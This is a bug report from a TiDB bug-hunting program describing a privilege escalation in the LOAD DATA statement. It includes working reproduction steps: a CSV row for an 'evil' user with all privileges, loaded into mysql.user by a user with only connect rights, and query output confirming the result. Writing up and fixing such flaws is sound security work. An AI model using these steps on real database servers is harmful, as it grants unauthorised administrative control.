search

tidb-challenge-program / bug-hunting-issue

Bug hunting issues.
3 stars 0 forks source link

P0-[4.0-bug-hunting]-[Load Data]-Privilege Escalation #33

Open wwar opened 4 years ago

wwar commented 4 years ago

Bug Report

1. What did you do?

The LOAD DATA statement does not privilege check. Thus, with the usage privilege (i.e. only permission to connect to MySQL) I can insert into the privileges table to grant an escalation. This does not take effect immediate, as a FLUSH PRIVILEGES event has to run.

2. What did you expect to see?

Privilege error.

3. What did you see instead?

$ echo "%,evil,,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y" > /tmp/create-evil-user.csv

mysql> CREATE USER nobody;
^C
$ mysql -unobody 
..
mysql> LOAD DATA LOCAL INFILE '/tmp/create-evil-user.csv' INTO TABLE mysql.user FIELDS TERMINATED BY ',' 
(Host,User,authentication_string,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,process_priv,grant_priv,references_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,index_priv,create_user_priv,event_priv,trigger_priv,create_role_priv,drop_role_priv,account_locked,shutdown_priv,reload_priv,file_priv);

...

mysql> select * from mysql.user where user='evil'\G
*************************** 1. row ***************************
                 Host: %
                 User: evil
authentication_string: 
          Select_priv: Y
          Insert_priv: Y
          Update_priv: Y
          Delete_priv: Y
          Create_priv: Y
            Drop_priv: Y
         Process_priv: Y
           Grant_priv: Y
      References_priv: Y
           Alter_priv: Y
         Show_db_priv: Y
           Super_priv: Y
Create_tmp_table_priv: Y
     Lock_tables_priv: Y
         Execute_priv: Y
     Create_view_priv: Y
       Show_view_priv: Y
  Create_routine_priv: Y
   Alter_routine_priv: Y
           Index_priv: Y
     Create_user_priv: Y
           Event_priv: Y
         Trigger_priv: Y
     Create_role_priv: Y
       Drop_role_priv: Y
       Account_locked: Y
        Shutdown_priv: Y
          Reload_priv: Y
            FILE_priv: Y
1 row in set (0.00 sec)

4. What version of TiDB are you using? (tidb-server -V or run select tidb_version(); on TiDB)

mysql> SELECT tidb_version()\G
*************************** 1. row ***************************
tidb_version(): Release Version: v4.0.0-beta.2-290-ga0c740784
Git Commit Hash: a0c7407846fbc84f939afbc091f2db54f48c1bfa
Git Branch: master
UTC Build Time: 2020-04-17 04:04:45
GoVersion: go1.13
Race Enabled: false
TiKV Min Version: v3.0.0-60965b006877ca7234adaced7890d7b029ed1306
Check Table Before Drop: false
1 row in set (0.01 sec)
wwar commented 4 years ago

This could be a bigger problem in earlier versions. FLUSH PRIVILEGES was only fixed at the start of January: https://github.com/pingcap/tidb/issues/14213

shuke987 commented 4 years ago

/bug P1